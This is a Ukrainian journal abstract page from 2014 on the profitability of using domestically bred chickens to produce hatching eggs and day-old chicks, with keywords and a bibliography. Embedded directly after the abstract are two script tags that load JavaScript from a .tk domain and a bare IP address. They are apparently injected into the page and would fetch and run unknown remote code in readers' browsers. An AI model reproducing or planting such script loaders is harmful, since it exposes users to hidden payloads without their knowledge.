ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 631.15[65.125.36]
Економіка агропромислового виробництва

Економічна ефективність використання курей вітчизняної селекції у племінних господарствах / Катеринич О. О., Прозорова Н. В. // Економіка АПК. - 2014. - № 1 - С. 30

Eфективність розвитку галузі птахівництва визначається технічними, технологічними, організаційними й економічними факторами, раціональне поєднання яких дає змогу виробляти продукцію, забезпечуючи прибутковість сільськогосподарських підприємств. Крім того, рентабельність виробництва яєць і м’яса птиці більшою мірою залежить від якості генетичних ресурсів, які використовуються для цих цілей. Проведення досліджень спрямовано на визначення економічної ефективності використання курей вітчизняної селекції для одержання інкубаційного яйця та добового молодняку. Розраховано показники рентабельності виробництва інкубаційних яєць і добового молодняку, які знаходилися у межах від -7,95 - 34,62% та 55,37 - 137,84 % у курей різного напряму продуктивності. Табл.: 1. Бібліогр.: 11.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: батьківське стадо, кури, селекція, яйце, добовий молодняк, рентабельність, ефективність

Список використаних джерел

 1. Фисинин В.И. Мировое животноводство: вызовы будущего/ В.И. Фисинин, С.В. Черепанов// Матер. XVІІ Междунар. конф. "Инновационные разработки и их освоение в промышленном птицеводстве". – Сергиев Посад, 2012. – С. 3–7.
 2. Терещенко О.В. Україна і світові тенденції розвитку ринку племінного птахівництва / О.В. Терещенко, О.О. Катеринич, О.В. Рожковський // Птахівництво : міжвід. темат. наук. зб. – ІП УААН. – Харків, 2009. – Вип. 63. – С. 26-37.
 3. Буркат В. П. Теорія, методологія і практика селекції / В. П. Буркат. – К.: „БМТ”, 1999. – 376 с.
 4. Флок Д. Фактор, ограничивающий селекционный процесс / Д. Флок, В. Бониц // Птицеводство. – 2000. – № 1. – С.45–48.
 5. Global poultry market bounces back // Poultry Executive Guide. – 2010. – Р. 4–6.
 6. Іонов І. А. Перспективна програма „Розвиток галузі птахівництва” до 2020 р. / І. А. Іонов, О. В. Терещенко, О. О. Катеринич // Птахівництво: міжвід. темат. наук. зб. / ІП УААН. – Борки, 2012. – Вип. 68. – С. 178–201.
 7. World egg production trend // Poultry Executive Guide. – 2010. – Р. 6-8.
 8. Jull, M.A. 1952. Poultry Breeding (3rd edn). John Wiley & Sons, New York. – 325 pp.
 9. Turkyilmaz, M.K., Nazligul, A., Balkaya, M. & Dereli, E.F. 2010. Effect of human factor on fear and stress reactions and some performance parameters in broiler chickens. Int. J. Poult. Sci. 9(1). – Р. 59–62.
 10. Khan, M.K.I., Khatun, M.J., Bhuiyan, M.S.A. & Sharmin, R. 2006. Production performance of Fayoumi chicken under intensive management. Pak. J. Biol. Sci., 9(2). – Р. 179–181.
 11. Mamum, S.H. 2005. Comparative assessment of hatchability of different strains of broiler parent stock. MS thesis, Dept. of Poultry Science, Bangladesh Agricultural University, Mymensingh, Р. 14–35.
Читати статтю: 14_01_30-32.pdf
Читати переклад статті: 1401katerynych.pdf